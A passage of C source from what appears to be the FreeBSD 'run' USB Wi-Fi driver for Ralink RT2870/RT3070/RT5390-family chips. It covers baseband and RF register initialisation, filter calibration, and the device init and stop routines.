RT5390_MAC_IF_CTRL); if (sc->mac_ver == 0x5592) { for (i = 0; i < nitems(rt5592_def_bbp); i++) { run_bbp_write(sc, rt5592_def_bbp[i].reg, rt5592_def_bbp[i].val); } for (i = 0; i < nitems(rt5592_bbp_r196); i++) { run_bbp_write(sc, 195, i + 0x80); run_bbp_write(sc, 196, rt5592_bbp_r196[i]); } } else { for (i = 0; i < nitems(rt5390_def_bbp); i++) { run_bbp_write(sc, rt5390_def_bbp[i].reg, rt5390_def_bbp[i].val); } } if (sc->mac_ver == 0x5392) { run_bbp_write(sc, 88, 0x90); run_bbp_write(sc, 95, 0x9a); run_bbp_write(sc, 98, 0x12); run_bbp_write(sc, 106, 0x12); run_bbp_write(sc, 134, 0xd0); run_bbp_write(sc, 135, 0xf6); run_bbp_write(sc, 148, 0x84); } run_bbp_read(sc, 152, &bbp); run_bbp_write(sc, 152, bbp | 0x80); /* Fix BBP254 for RT5592C. */ if (sc->mac_ver == 0x5592 && sc->mac_rev >= 0x0221) { run_bbp_read(sc, 254, &bbp); run_bbp_write(sc, 254, bbp | 0x80); } /* Disable hardware antenna diversity. */ if (sc->mac_ver == 0x5390) run_bbp_write(sc, 154, 0); /* Initialize Rx CCK/OFDM frequency offset report. 
*/ run_bbp_write(sc, 142, 1); run_bbp_write(sc, 143, 57); } static int run_bbp_init(struct run_softc *sc) { int i, error, ntries; uint8_t bbp0; /* wait for BBP to wake up */ for (ntries = 0; ntries < 20; ntries++) { if ((error = run_bbp_read(sc, 0, &bbp0)) != 0) return error; if (bbp0 != 0 && bbp0 != 0xff) break; } if (ntries == 20) return (ETIMEDOUT); /* initialize BBP registers to default values */ if (sc->mac_ver >= 0x5390) run_rt5390_bbp_init(sc); else { for (i = 0; i < nitems(rt2860_def_bbp); i++) { run_bbp_write(sc, rt2860_def_bbp[i].reg, rt2860_def_bbp[i].val); } } if (sc->mac_ver == 0x3593) { run_bbp_write(sc, 79, 0x13); run_bbp_write(sc, 80, 0x05); run_bbp_write(sc, 81, 0x33); run_bbp_write(sc, 86, 0x46); run_bbp_write(sc, 137, 0x0f); } /* fix BBP84 for RT2860E */ if (sc->mac_ver == 0x2860 && sc->mac_rev != 0x0101) run_bbp_write(sc, 84, 0x19); if (sc->mac_ver >= 0x3070 && (sc->mac_ver != 0x3593 && sc->mac_ver != 0x5592)) { run_bbp_write(sc, 79, 0x13); run_bbp_write(sc, 80, 0x05); run_bbp_write(sc, 81, 0x33); } else if (sc->mac_ver == 0x2860 && sc->mac_rev == 0x0100) { run_bbp_write(sc, 69, 0x16); run_bbp_write(sc, 73, 0x12); } return (0); } static int run_rt3070_rf_init(struct run_softc *sc) { uint32_t tmp; uint8_t bbp4, mingain, rf, target; int i; run_rt3070_rf_read(sc, 30, &rf); /* toggle RF R30 bit 7 */ run_rt3070_rf_write(sc, 30, rf | 0x80); run_delay(sc, 10); run_rt3070_rf_write(sc, 30, rf & ~0x80); /* initialize RF registers to default value */ if (sc->mac_ver == 0x3572) { for (i = 0; i < nitems(rt3572_def_rf); i++) { run_rt3070_rf_write(sc, rt3572_def_rf[i].reg, rt3572_def_rf[i].val); } } else { for (i = 0; i < nitems(rt3070_def_rf); i++) { run_rt3070_rf_write(sc, rt3070_def_rf[i].reg, rt3070_def_rf[i].val); } } if (sc->mac_ver == 0x3070 && sc->mac_rev < 0x0201) { /* * Change voltage from 1.2V to 1.35V for RT3070. * The DAC issue (RT3070_LDO_CFG0) has been fixed * in RT3070(F). */ run_read(sc, RT3070_LDO_CFG0, &tmp); tmp = (tmp & ~0x0f000000) | 0x0d000000; run_write(sc, RT3070_LDO_CFG0, tmp); } else if (sc->mac_ver == 0x3071) { run_rt3070_rf_read(sc, 6, &rf); run_rt3070_rf_write(sc, 6, rf | 0x40); run_rt3070_rf_write(sc, 31, 0x14); run_read(sc, RT3070_LDO_CFG0, &tmp); tmp &= ~0x1f000000; if (sc->mac_rev < 0x0211) tmp |= 0x0d000000; /* 1.3V */ else tmp |= 0x01000000; /* 1.2V */ run_write(sc, RT3070_LDO_CFG0, tmp); /* patch LNA_PE_G1 */ run_read(sc, RT3070_GPIO_SWITCH, &tmp); run_write(sc, RT3070_GPIO_SWITCH, tmp & ~0x20); } else if (sc->mac_ver == 0x3572) { run_rt3070_rf_read(sc, 6, &rf); run_rt3070_rf_write(sc, 6, rf | 0x40); /* increase voltage from 1.2V to 1.35V */ run_read(sc, RT3070_LDO_CFG0, &tmp); tmp = (tmp & ~0x1f000000) | 0x0d000000; run_write(sc, RT3070_LDO_CFG0, tmp); if (sc->mac_rev < 0x0211 || !sc->patch_dac) { run_delay(sc, 1); /* wait for 1msec */ /* decrease voltage back to 1.2V */ tmp = (tmp & ~0x1f000000) | 0x01000000; run_write(sc, RT3070_LDO_CFG0, tmp); } } /* select 20MHz bandwidth */ run_rt3070_rf_read(sc, 31, &rf); run_rt3070_rf_write(sc, 31, rf & ~0x20); /* calibrate filter for 20MHz bandwidth */ sc->rf24_20mhz = 0x1f; /* default value */ target = (sc->mac_ver < 0x3071) ? 0x16 : 0x13; run_rt3070_filter_calib(sc, 0x07, target, &sc->rf24_20mhz); /* select 40MHz bandwidth */ run_bbp_read(sc, 4, &bbp4); run_bbp_write(sc, 4, (bbp4 & ~0x18) | 0x10); run_rt3070_rf_read(sc, 31, &rf); run_rt3070_rf_write(sc, 31, rf | 0x20); /* calibrate filter for 40MHz bandwidth */ sc->rf24_40mhz = 0x2f; /* default value */ target = (sc->mac_ver < 0x3071) ? 
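/* 40MHz calibration target: 0x19 on RT3070, 0x15 on RT3071 and later */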
0x19 : 0x15; run_rt3070_filter_calib(sc, 0x27, target, &sc->rf24_40mhz); /* go back to 20MHz bandwidth */ run_bbp_read(sc, 4, &bbp4); run_bbp_write(sc, 4, bbp4 & ~0x18); if (sc->mac_ver == 0x3572) { /* save default BBP registers 25 and 26 values */ run_bbp_read(sc, 25, &sc->bbp25); run_bbp_read(sc, 26, &sc->bbp26); } else if (sc->mac_rev < 0x0201 || sc->mac_rev < 0x0211) run_rt3070_rf_write(sc, 27, 0x03); run_read(sc, RT3070_OPT_14, &tmp); run_write(sc, RT3070_OPT_14, tmp | 1); if (sc->mac_ver == 0x3070 || sc->mac_ver == 0x3071) { run_rt3070_rf_read(sc, 17, &rf); rf &= ~RT3070_TX_LO1; if ((sc->mac_ver == 0x3070 || (sc->mac_ver == 0x3071 && sc->mac_rev >= 0x0211)) && !sc->ext_2ghz_lna) rf |= 0x20; /* fix for long range Rx issue */ mingain = (sc->mac_ver == 0x3070) ? 1 : 2; if (sc->txmixgain_2ghz >= mingain) rf = (rf & ~0x7) | sc->txmixgain_2ghz; run_rt3070_rf_write(sc, 17, rf); } if (sc->mac_ver == 0x3071) { run_rt3070_rf_read(sc, 1, &rf); rf &= ~(RT3070_RX0_PD | RT3070_TX0_PD); rf |= RT3070_RF_BLOCK | RT3070_RX1_PD | RT3070_TX1_PD; run_rt3070_rf_write(sc, 1, rf); run_rt3070_rf_read(sc, 15, &rf); run_rt3070_rf_write(sc, 15, rf & ~RT3070_TX_LO2); run_rt3070_rf_read(sc, 20, &rf); run_rt3070_rf_write(sc, 20, rf & ~RT3070_RX_LO1); run_rt3070_rf_read(sc, 21, &rf); run_rt3070_rf_write(sc, 21, rf & ~RT3070_RX_LO2); } if (sc->mac_ver == 0x3070 || sc->mac_ver == 0x3071) { /* fix Tx to Rx IQ glitch by raising RF voltage */ run_rt3070_rf_read(sc, 27, &rf); rf &= ~0x77; if (sc->mac_rev < 0x0211) rf |= 0x03; run_rt3070_rf_write(sc, 27, rf); } return (0); } static void run_rt3593_rf_init(struct run_softc *sc) { uint32_t tmp; uint8_t rf; int i; /* Disable the GPIO bits 4 and 7 for LNA PE control. */ run_read(sc, RT3070_GPIO_SWITCH, &tmp); tmp &= ~(1 << 4 | 1 << 7); run_write(sc, RT3070_GPIO_SWITCH, tmp); /* Initialize RF registers to default value. */ for (i = 0; i < nitems(rt3593_def_rf); i++) { run_rt3070_rf_write(sc, rt3593_def_rf[i].reg, rt3593_def_rf[i].val); } /* Toggle RF R2 to initiate calibration. */ run_rt3070_rf_write(sc, 2, RT5390_RESCAL); /* Initialize RF frequency offset. */ run_adjust_freq_offset(sc); run_rt3070_rf_read(sc, 18, &rf); run_rt3070_rf_write(sc, 18, rf | RT3593_AUTOTUNE_BYPASS); /* * Increase voltage from 1.2V to 1.35V, wait for 1 msec to * decrease voltage back to 1.2V. */ run_read(sc, RT3070_LDO_CFG0, &tmp); tmp = (tmp & ~0x1f000000) | 0x0d000000; run_write(sc, RT3070_LDO_CFG0, tmp); run_delay(sc, 1); tmp = (tmp & ~0x1f000000) | 0x01000000; run_write(sc, RT3070_LDO_CFG0, tmp); sc->rf24_20mhz = 0x1f; sc->rf24_40mhz = 0x2f; /* Save default BBP registers 25 and 26 values. */ run_bbp_read(sc, 25, &sc->bbp25); run_bbp_read(sc, 26, &sc->bbp26); run_read(sc, RT3070_OPT_14, &tmp); run_write(sc, RT3070_OPT_14, tmp | 1); } static void run_rt5390_rf_init(struct run_softc *sc) { uint32_t tmp; uint8_t rf; int i; /* Toggle RF R2 to initiate calibration. */ if (sc->mac_ver == 0x5390) { run_rt3070_rf_read(sc, 2, &rf); run_rt3070_rf_write(sc, 2, rf | RT5390_RESCAL); run_delay(sc, 10); run_rt3070_rf_write(sc, 2, rf & ~RT5390_RESCAL); } else { run_rt3070_rf_write(sc, 2, RT5390_RESCAL); run_delay(sc, 10); } /* Initialize RF registers to default value. */ if (sc->mac_ver == 0x5592) { for (i = 0; i < nitems(rt5592_def_rf); i++) { run_rt3070_rf_write(sc, rt5592_def_rf[i].reg, rt5592_def_rf[i].val); } /* Initialize RF frequency offset. 
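* (run_adjust_freq_offset(), defined later in this file, folds sc->freq into the low bits of RF register 17 and notifies the MCU.)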
*/ run_adjust_freq_offset(sc); } else if (sc->mac_ver == 0x5392) { for (i = 0; i < nitems(rt5392_def_rf); i++) { run_rt3070_rf_write(sc, rt5392_def_rf[i].reg, rt5392_def_rf[i].val); } if (sc->mac_rev >= 0x0223) { run_rt3070_rf_write(sc, 23, 0x0f); run_rt3070_rf_write(sc, 24, 0x3e); run_rt3070_rf_write(sc, 51, 0x32); run_rt3070_rf_write(sc, 53, 0x22); run_rt3070_rf_write(sc, 56, 0xc1); run_rt3070_rf_write(sc, 59, 0x0f); } } else { for (i = 0; i < nitems(rt5390_def_rf); i++) { run_rt3070_rf_write(sc, rt5390_def_rf[i].reg, rt5390_def_rf[i].val); } if (sc->mac_rev >= 0x0502) { run_rt3070_rf_write(sc, 6, 0xe0); run_rt3070_rf_write(sc, 25, 0x80); run_rt3070_rf_write(sc, 46, 0x73); run_rt3070_rf_write(sc, 53, 0x00); run_rt3070_rf_write(sc, 56, 0x42); run_rt3070_rf_write(sc, 61, 0xd1); } } sc->rf24_20mhz = 0x1f; /* default value */ sc->rf24_40mhz = (sc->mac_ver == 0x5592) ? 0 : 0x2f; if (sc->mac_rev < 0x0211) run_rt3070_rf_write(sc, 27, 0x3); run_read(sc, RT3070_OPT_14, &tmp); run_write(sc, RT3070_OPT_14, tmp | 1); } static int run_rt3070_filter_calib(struct run_softc *sc, uint8_t init, uint8_t target, uint8_t *val) { uint8_t rf22, rf24; uint8_t bbp55_pb, bbp55_sb, delta; int ntries; /* program filter */ run_rt3070_rf_read(sc, 24, &rf24); rf24 = (rf24 & 0xc0) | init; /* initial filter value */ run_rt3070_rf_write(sc, 24, rf24); /* enable baseband loopback mode */ run_rt3070_rf_read(sc, 22, &rf22); run_rt3070_rf_write(sc, 22, rf22 | 0x01); /* set power and frequency of passband test tone */ run_bbp_write(sc, 24, 0x00); for (ntries = 0; ntries < 100; ntries++) { /* transmit test tone */ run_bbp_write(sc, 25, 0x90); run_delay(sc, 10); /* read received power */ run_bbp_read(sc, 55, &bbp55_pb); if (bbp55_pb != 0) break; } if (ntries == 100) return (ETIMEDOUT); /* set power and frequency of stopband test tone */ run_bbp_write(sc, 24, 0x06); for (ntries = 0; ntries < 100; ntries++) { /* transmit test tone */ run_bbp_write(sc, 25, 0x90); run_delay(sc, 10); /* read received power */ run_bbp_read(sc, 55, &bbp55_sb); delta = bbp55_pb - bbp55_sb; if (delta > target) break; /* reprogram filter */ rf24++; run_rt3070_rf_write(sc, 24, rf24); } if (ntries < 100) { if (rf24 != init) rf24--; /* backtrack */ *val = rf24; run_rt3070_rf_write(sc, 24, rf24); } /* restore initial state */ run_bbp_write(sc, 24, 0x00); /* disable baseband loopback mode */ run_rt3070_rf_read(sc, 22, &rf22); run_rt3070_rf_write(sc, 22, rf22 & ~0x01); return (0); } static void run_rt3070_rf_setup(struct run_softc *sc) { uint8_t bbp, rf; int i; if (sc->mac_ver == 0x3572) { /* enable DC filter */ if (sc->mac_rev >= 0x0201) run_bbp_write(sc, 103, 0xc0); run_bbp_read(sc, 138, &bbp); if (sc->ntxchains == 1) bbp |= 0x20; /* turn off DAC1 */ if (sc->nrxchains == 1) bbp &= ~0x02; /* turn off ADC1 */ run_bbp_write(sc, 138, bbp); if (sc->mac_rev >= 0x0211) { /* improve power consumption */ run_bbp_read(sc, 31, &bbp); run_bbp_write(sc, 31, bbp & ~0x03); } run_rt3070_rf_read(sc, 16, &rf); rf = (rf & ~0x07) | sc->txmixgain_2ghz; run_rt3070_rf_write(sc, 16, rf); } else if (sc->mac_ver == 0x3071) { if (sc->mac_rev >= 0x0211) { /* enable DC filter */ run_bbp_write(sc, 103, 0xc0); /* improve power consumption */ run_bbp_read(sc, 31, &bbp); run_bbp_write(sc, 31, bbp & ~0x03); } run_bbp_read(sc, 138, &bbp); if (sc->ntxchains == 1) bbp |= 0x20; /* turn off DAC1 */ if (sc->nrxchains == 1) bbp &= ~0x02; /* turn off ADC1 */ run_bbp_write(sc, 138, bbp); run_write(sc, RT2860_TX_SW_CFG1, 0); if (sc->mac_rev < 0x0211) { run_write(sc, RT2860_TX_SW_CFG2, sc->patch_dac ? 
0x2c : 0x0f); } else run_write(sc, RT2860_TX_SW_CFG2, 0); } else if (sc->mac_ver == 0x3070) { if (sc->mac_rev >= 0x0201) { /* enable DC filter */ run_bbp_write(sc, 103, 0xc0); /* improve power consumption */ run_bbp_read(sc, 31, &bbp); run_bbp_write(sc, 31, bbp & ~0x03); } if (sc->mac_rev < 0x0201) { run_write(sc, RT2860_TX_SW_CFG1, 0); run_write(sc, RT2860_TX_SW_CFG2, 0x2c); } else run_write(sc, RT2860_TX_SW_CFG2, 0); } /* initialize RF registers from ROM for >=RT3071*/ if (sc->mac_ver >= 0x3071) { for (i = 0; i < 10; i++) { if (sc->rf[i].reg == 0 || sc->rf[i].reg == 0xff) continue; run_rt3070_rf_write(sc, sc->rf[i].reg, sc->rf[i].val); } } } static void run_rt3593_rf_setup(struct run_softc *sc) { uint8_t bbp, rf; if (sc->mac_rev >= 0x0211) { /* Enable DC filter. */ run_bbp_write(sc, 103, 0xc0); } run_write(sc, RT2860_TX_SW_CFG1, 0); if (sc->mac_rev < 0x0211) { run_write(sc, RT2860_TX_SW_CFG2, sc->patch_dac ? 0x2c : 0x0f); } else run_write(sc, RT2860_TX_SW_CFG2, 0); run_rt3070_rf_read(sc, 50, &rf); run_rt3070_rf_write(sc, 50, rf & ~RT3593_TX_LO2); run_rt3070_rf_read(sc, 51, &rf); rf = (rf & ~(RT3593_TX_LO1 | 0x0c)) | ((sc->txmixgain_2ghz & 0x07) << 2); run_rt3070_rf_write(sc, 51, rf); run_rt3070_rf_read(sc, 38, &rf); run_rt3070_rf_write(sc, 38, rf & ~RT5390_RX_LO1); run_rt3070_rf_read(sc, 39, &rf); run_rt3070_rf_write(sc, 39, rf & ~RT5390_RX_LO2); run_rt3070_rf_read(sc, 1, &rf); run_rt3070_rf_write(sc, 1, rf & ~(RT3070_RF_BLOCK | RT3070_PLL_PD)); run_rt3070_rf_read(sc, 30, &rf); rf = (rf & ~0x18) | 0x10; run_rt3070_rf_write(sc, 30, rf); /* Apply maximum likelihood detection for 2 stream case. */ run_bbp_read(sc, 105, &bbp); if (sc->nrxchains > 1) run_bbp_write(sc, 105, bbp | RT5390_MLD); /* Avoid data lost and CRC error. */ run_bbp_read(sc, 4, &bbp); run_bbp_write(sc, 4, bbp | RT5390_MAC_IF_CTRL); run_bbp_write(sc, 92, 0x02); run_bbp_write(sc, 82, 0x82); run_bbp_write(sc, 106, 0x05); run_bbp_write(sc, 104, 0x92); run_bbp_write(sc, 88, 0x90); run_bbp_write(sc, 148, 0xc8); run_bbp_write(sc, 47, 0x48); run_bbp_write(sc, 120, 0x50); run_bbp_write(sc, 163, 0x9d); /* SNR mapping. */ run_bbp_write(sc, 142, 0x06); run_bbp_write(sc, 143, 0xa0); run_bbp_write(sc, 142, 0x07); run_bbp_write(sc, 143, 0xa1); run_bbp_write(sc, 142, 0x08); run_bbp_write(sc, 143, 0xa2); run_bbp_write(sc, 31, 0x08); run_bbp_write(sc, 68, 0x0b); run_bbp_write(sc, 105, 0x04); } static void run_rt5390_rf_setup(struct run_softc *sc) { uint8_t bbp, rf; if (sc->mac_rev >= 0x0211) { /* Enable DC filter. */ run_bbp_write(sc, 103, 0xc0); if (sc->mac_ver != 0x5592) { /* Improve power consumption. */ run_bbp_read(sc, 31, &bbp); run_bbp_write(sc, 31, bbp & ~0x03); } } run_bbp_read(sc, 138, &bbp); if (sc->ntxchains == 1) bbp |= 0x20; /* turn off DAC1 */ if (sc->nrxchains == 1) bbp &= ~0x02; /* turn off ADC1 */ run_bbp_write(sc, 138, bbp); run_rt3070_rf_read(sc, 38, &rf); run_rt3070_rf_write(sc, 38, rf & ~RT5390_RX_LO1); run_rt3070_rf_read(sc, 39, &rf); run_rt3070_rf_write(sc, 39, rf & ~RT5390_RX_LO2); /* Avoid data lost and CRC error. */ run_bbp_read(sc, 4, &bbp); run_bbp_write(sc, 4, bbp | RT5390_MAC_IF_CTRL); run_rt3070_rf_read(sc, 30, &rf); rf = (rf & ~0x18) | 0x10; run_rt3070_rf_write(sc, 30, rf); if (sc->mac_ver != 0x5592) { run_write(sc, RT2860_TX_SW_CFG1, 0); if (sc->mac_rev < 0x0211) { run_write(sc, RT2860_TX_SW_CFG2, sc->patch_dac ? 
0x2c : 0x0f); } else run_write(sc, RT2860_TX_SW_CFG2, 0); } } static int run_txrx_enable(struct run_softc *sc) { struct ieee80211com *ic = sc->sc_ifp->if_l2com; uint32_t tmp; int error, ntries; run_write(sc, RT2860_MAC_SYS_CTRL, RT2860_MAC_TX_EN); for (ntries = 0; ntries < 200; ntries++) { if ((error = run_read(sc, RT2860_WPDMA_GLO_CFG, &tmp)) != 0) return (error); if ((tmp & (RT2860_TX_DMA_BUSY | RT2860_RX_DMA_BUSY)) == 0) break; run_delay(sc, 50); } if (ntries == 200) return (ETIMEDOUT); run_delay(sc, 50); tmp |= RT2860_RX_DMA_EN | RT2860_TX_DMA_EN | RT2860_TX_WB_DDONE; run_write(sc, RT2860_WPDMA_GLO_CFG, tmp); /* enable Rx bulk aggregation (set timeout and limit) */ tmp = RT2860_USB_TX_EN | RT2860_USB_RX_EN | RT2860_USB_RX_AGG_EN | RT2860_USB_RX_AGG_TO(128) | RT2860_USB_RX_AGG_LMT(2); run_write(sc, RT2860_USB_DMA_CFG, tmp); /* set Rx filter */ tmp = RT2860_DROP_CRC_ERR | RT2860_DROP_PHY_ERR; if (ic->ic_opmode != IEEE80211_M_MONITOR) { tmp |= RT2860_DROP_UC_NOME | RT2860_DROP_DUPL | RT2860_DROP_CTS | RT2860_DROP_BA | RT2860_DROP_ACK | RT2860_DROP_VER_ERR | RT2860_DROP_CTRL_RSV | RT2860_DROP_CFACK | RT2860_DROP_CFEND; if (ic->ic_opmode == IEEE80211_M_STA) tmp |= RT2860_DROP_RTS | RT2860_DROP_PSPOLL; } run_write(sc, RT2860_RX_FILTR_CFG, tmp); run_write(sc, RT2860_MAC_SYS_CTRL, RT2860_MAC_RX_EN | RT2860_MAC_TX_EN); return (0); } static void run_adjust_freq_offset(struct run_softc *sc) { uint8_t rf, tmp; run_rt3070_rf_read(sc, 17, &rf); tmp = rf; rf = (rf & ~0x7f) | (sc->freq & 0x7f); rf = MIN(rf, 0x5f); if (tmp != rf) run_mcu_cmd(sc, 0x74, (tmp << 8 ) | rf); } static void run_init_locked(struct run_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint32_t tmp; uint8_t bbp1, bbp3; int i; int ridx; int ntries; if (ic->ic_nrunning > 1) return; run_stop(sc); if (run_load_microcode(sc) != 0) { device_printf(sc->sc_dev, "could not load 8051 microcode\n"); goto fail; } for (ntries = 0; ntries < 100; ntries++) { if (run_read(sc, RT2860_ASIC_VER_ID, &tmp) != 0) goto fail; if (tmp != 0 && tmp != 0xffffffff) break; run_delay(sc, 10); } if (ntries == 100) goto fail; for (i = 0; i != RUN_EP_QUEUES; i++) run_setup_tx_list(sc, &sc->sc_epq[i]); run_set_macaddr(sc, IF_LLADDR(ifp)); for (ntries = 0; ntries < 100; ntries++) { if (run_read(sc, RT2860_WPDMA_GLO_CFG, &tmp) != 0) goto fail; if ((tmp & (RT2860_TX_DMA_BUSY | RT2860_RX_DMA_BUSY)) == 0) break; run_delay(sc, 10); } if (ntries == 100) { device_printf(sc->sc_dev, "timeout waiting for DMA engine\n"); goto fail; } tmp &= 0xff0; tmp |= RT2860_TX_WB_DDONE; run_write(sc, RT2860_WPDMA_GLO_CFG, tmp); /* turn off PME_OEN to solve high-current issue */ run_read(sc, RT2860_SYS_CTRL, &tmp); run_write(sc, RT2860_SYS_CTRL, tmp & ~RT2860_PME_OEN); run_write(sc, RT2860_MAC_SYS_CTRL, RT2860_BBP_HRST | RT2860_MAC_SRST); run_write(sc, RT2860_USB_DMA_CFG, 0); if (run_reset(sc) != 0) { device_printf(sc->sc_dev, "could not reset chipset\n"); goto fail; } run_write(sc, RT2860_MAC_SYS_CTRL, 0); /* init Tx power for all Tx rates (from EEPROM) */ for (ridx = 0; ridx < 5; ridx++) { if (sc->txpow20mhz[ridx] == 0xffffffff) continue; run_write(sc, RT2860_TX_PWR_CFG(ridx), sc->txpow20mhz[ridx]); } for (i = 0; i < nitems(rt2870_def_mac); i++) run_write(sc, rt2870_def_mac[i].reg, rt2870_def_mac[i].val); run_write(sc, RT2860_WMM_AIFSN_CFG, 0x00002273); run_write(sc, RT2860_WMM_CWMIN_CFG, 0x00002344); run_write(sc, RT2860_WMM_CWMAX_CFG, 0x000034aa); if (sc->mac_ver >= 0x5390) { run_write(sc, RT2860_TX_SW_CFG0, 4 << RT2860_DLY_PAPE_EN_SHIFT | 4); if 
(sc->mac_ver >= 0x5392) { run_write(sc, RT2860_MAX_LEN_CFG, 0x00002fff); if (sc->mac_ver == 0x5592) { run_write(sc, RT2860_HT_FBK_CFG1, 0xedcba980); run_write(sc, RT2860_TXOP_HLDR_ET, 0x00000082); } else { run_write(sc, RT2860_HT_FBK_CFG1, 0xedcb4980); run_write(sc, RT2860_LG_FBK_CFG0, 0xedcba322); } } } else if (sc->mac_ver == 0x3593) { run_write(sc, RT2860_TX_SW_CFG0, 4 << RT2860_DLY_PAPE_EN_SHIFT | 2); } else if (sc->mac_ver >= 0x3070) { /* set delay of PA_PE assertion to 1us (unit of 0.25us) */ run_write(sc, RT2860_TX_SW_CFG0, 4 << RT2860_DLY_PAPE_EN_SHIFT); } /* wait while MAC is busy */ for (ntries = 0; ntries < 100; ntries++) { if (run_read(sc, RT2860_MAC_STATUS_REG, &tmp) != 0) goto fail; if (!(tmp & (RT2860_RX_STATUS_BUSY | RT2860_TX_STATUS_BUSY))) break; run_delay(sc, 10); } if (ntries == 100) goto fail; /* clear Host to MCU mailbox */ run_write(sc, RT2860_H2M_BBPAGENT, 0); run_write(sc, RT2860_H2M_MAILBOX, 0); run_delay(sc, 10); if (run_bbp_init(sc) != 0) { device_printf(sc->sc_dev, "could not initialize BBP\n"); goto fail; } /* abort TSF synchronization */ run_read(sc, RT2860_BCN_TIME_CFG, &tmp); tmp &= ~(RT2860_BCN_TX_EN | RT2860_TSF_TIMER_EN | RT2860_TBTT_TIMER_EN); run_write(sc, RT2860_BCN_TIME_CFG, tmp); /* clear RX WCID search table */ run_set_region_4(sc, RT2860_WCID_ENTRY(0), 0, 512); /* clear WCID attribute table */ run_set_region_4(sc, RT2860_WCID_ATTR(0), 0, 8 * 32); /* hostapd sets a key before init. So, don't clear it. */ if (sc->cmdq_key_set != RUN_CMDQ_GO) { /* clear shared key table */ run_set_region_4(sc, RT2860_SKEY(0, 0), 0, 8 * 32); /* clear shared key mode */ run_set_region_4(sc, RT2860_SKEY_MODE_0_7, 0, 4); } run_read(sc, RT2860_US_CYC_CNT, &tmp); tmp = (tmp & ~0xff) | 0x1e; run_write(sc, RT2860_US_CYC_CNT, tmp); if (sc->mac_rev != 0x0101) run_write(sc, RT2860_TXOP_CTRL_CFG, 0x0000583f); run_write(sc, RT2860_WMM_TXOP0_CFG, 0); run_write(sc, RT2860_WMM_TXOP1_CFG, 48 << 16 | 96); /* write vendor-specific BBP values (from EEPROM) */ if (sc->mac_ver < 0x3593) { for (i = 0; i < 10; i++) { if (sc->bbp[i].reg == 0 || sc->bbp[i].reg == 0xff) continue; run_bbp_write(sc, sc->bbp[i].reg, sc->bbp[i].val); } } /* select Main antenna for 1T1R devices */ if (sc->rf_rev == RT3070_RF_3020 || sc->rf_rev == RT5390_RF_5370) run_set_rx_antenna(sc, 0); /* send LEDs operating mode to microcontroller */ (void)run_mcu_cmd(sc, RT2860_MCU_CMD_LED1, sc->led[0]); (void)run_mcu_cmd(sc, RT2860_MCU_CMD_LED2, sc->led[1]); (void)run_mcu_cmd(sc, RT2860_MCU_CMD_LED3, sc->led[2]); if (sc->mac_ver >= 0x5390) run_rt5390_rf_init(sc); else if (sc->mac_ver == 0x3593) run_rt3593_rf_init(sc); else if (sc->mac_ver >= 0x3070) run_rt3070_rf_init(sc); /* disable non-existing Rx chains */ run_bbp_read(sc, 3, &bbp3); bbp3 &= ~(1 << 3 | 1 << 4); if (sc->nrxchains == 2) bbp3 |= 1 << 3; else if (sc->nrxchains == 3) bbp3 |= 1 << 4; run_bbp_write(sc, 3, bbp3); /* disable non-existing Tx chains */ run_bbp_read(sc, 1, &bbp1); if (sc->ntxchains == 1) bbp1 &= ~(1 << 3 | 1 << 4); run_bbp_write(sc, 1, bbp1); if (sc->mac_ver >= 0x5390) run_rt5390_rf_setup(sc); else if (sc->mac_ver == 0x3593) run_rt3593_rf_setup(sc); else if (sc->mac_ver >= 0x3070) run_rt3070_rf_setup(sc); /* select default channel */ run_set_chan(sc, ic->ic_curchan); /* setup initial protection mode */ run_updateprot_cb(ic); /* turn radio LED on */ run_set_leds(sc, RT2860_LED_RADIO); ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; ifp->if_drv_flags |= IFF_DRV_RUNNING; sc->cmdq_run = RUN_CMDQ_GO; for (i = 0; i != RUN_N_XFER; i++) 
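/* force a clear-stall on every transfer before restarting I/O */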
usbd_xfer_set_stall(sc->sc_xfer[i]); usbd_transfer_start(sc->sc_xfer[RUN_BULK_RX]); if (run_txrx_enable(sc) != 0) goto fail; return; fail: run_stop(sc); } static void run_init(void *arg) { struct run_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; RUN_LOCK(sc); run_init_locked(sc); RUN_UNLOCK(sc); if (ifp->if_drv_flags & IFF_DRV_RUNNING) ieee80211_start_all(ic); } static void run_stop(void *arg) { struct run_softc *sc = (struct run_softc *)arg; struct ifnet *ifp = sc->sc_ifp; uint32_t tmp; int i; int ntries; RUN_LOCK_ASSERT(sc, MA_OWNED); if (ifp->if_drv_flags & IFF_DRV_RUNNING) run_set_leds(sc, 0); /* turn all LEDs off */ ifp->if_drv_flags &= ~(IFF_DRV_RUNNING | IFF_DRV_OACTIVE); sc->ratectl_run = RUN_RATECTL_OFF; sc->cmdq_run = sc->cmdq_key_set; RUN_UNLOCK(sc); for(i = 0; i < RUN_N_XFER; i++) usbd_transfer_drain(sc->sc_xfer[i]); RUN_LOCK(sc); if (sc->rx_m != NULL) { m_free(sc->rx_m); sc->rx_m = NULL; } /* Disable Tx/Rx DMA. */ if (run_read(sc, RT2860_WPDMA_GLO_CFG, &tmp) != 0) return; tmp &= ~(RT2860_RX_DMA_EN | RT2860_TX_DMA_EN); run_write(sc, RT2860_WPDMA_GLO_CFG, tmp); for (ntries = 0; ntries < 100; ntries++) { if (run_read(sc, RT2860_WPDMA_GLO_CFG, &tmp) != 0) return; if ((tmp & (RT2860_TX_DMA_BUSY | RT2860_RX_DMA_BUSY)) == 0) break; run_delay(sc, 10); } if (ntries == 100) { device_printf(sc->sc_dev, "timeout waiting for DMA engine\n"); return; } /* disable Tx/Rx */ run_read(sc, RT2860_MAC_SYS_CTRL, &tmp); tmp &= ~(RT2860_MAC_RX_EN | RT2860_MAC_TX_EN); run_write(sc, RT2860_MAC_SYS_CTRL, tmp); /* wait for pending Tx to complete */ for (ntries = 0; ntries < 100; ntries++) { if (run_read(sc, RT2860_TXRXQ_PCNT, &tmp) != 0) { DPRINTF("Cannot read Tx queue count\n"); break; } if ((tmp & RT2860_TX2Q_PCNT_MASK) == 0) { DPRINTF("All Tx cleared\n"); break; } run_delay(sc, 10); } if (ntries >= 100) DPRINTF("There are still pending Tx\n"); run_delay(sc, 10); run_write(sc, RT2860_USB_DMA_CFG, 0); run_write(sc, RT2860_MAC_SYS_CTRL, RT2860_BBP_HRST | RT2860_MAC_SRST); run_write(sc, RT2860_MAC_SYS_CTRL, 0); for (i = 0; i != RUN_EP_QUEUES; i++) run_unsetup_tx_list(sc, &sc->sc_epq[i]); } static void 